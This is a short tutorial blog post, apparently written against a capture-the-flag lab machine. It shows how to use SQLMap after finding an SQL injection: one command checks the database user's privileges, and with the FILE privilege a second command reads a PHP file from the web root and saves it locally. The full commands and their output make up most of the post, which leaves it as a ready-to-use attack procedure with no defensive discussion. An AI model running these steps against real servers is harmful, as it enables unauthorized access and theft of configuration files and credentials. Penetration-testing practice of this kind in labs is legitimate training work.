SQLMap read file on the server

Hi Guys,

There is a time where you found vulnerability on the server related to SQL injection and want to leverage the attack to get more information from the server.

Basically, SQLMap provide you with capabilities to read file from the server when you have enough privilege. To check wether you have the privilege by using this command

sqlmap -r header-req --current-user --privileges

[*] 'hector'@'localhost' (administrator) [29]:                                                                                                                           
    privilege: ALTER                                                                                                                                                     
    privilege: ALTER ROUTINE                                                                                                                                             
    privilege: CREATE                                                                                                                                                    
    privilege: CREATE ROUTINE                                                                                                                                            
    privilege: CREATE TABLESPACE                                                                                                                                         
    privilege: CREATE TEMPORARY TABLES                                                                                                                                   
    privilege: CREATE USER                                                                                                                                               
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DELETE HISTORY
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE

If you see that you have got that FILE privilege then you are able to read some file on the server with this below sample

sqlmap -r header-req --file-read=C:\\inetpub\\wwwroot\\database.php

[18:31:20] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[18:31:20] [INFO] fingerprinting the back-end DBMS operating system
[18:31:20] [INFO] the back-end DBMS operating system is Windows
[18:31:20] [INFO] fetching file: 'C:/inetpub/wwwroot/database.php'
[18:31:21] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                                          
[18:31:28] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[18:31:28] [WARNING] unable to retrieve the content of the file 'C:/inetpub/wwwroot/database.php', going to fall-back to simpler UNION technique
[18:31:28] [INFO] fetching file: 'C:/inetpub/wwwroot/database.php'
do you want confirmation that the remote file 'C:/inetpub/wwwroot/database.php' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[18:31:33] [INFO] the local file '/root/.sqlmap/output/10.10.10.167/files/C__inetpub_wwwroot_database.php' and the remote file 'C:/inetpub/wwwroot/database.php' have the same size (904 B)
files saved to [1]:
[*] /root/.sqlmap/output/10.10.10.167/files/C__inetpub_wwwroot_database.php (same file)

[18:31:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167'

[*] ending @ 18:31:33 /2020-05-25/

You can see the file database.php at the specified path was able to be downloaded and stored in our machine.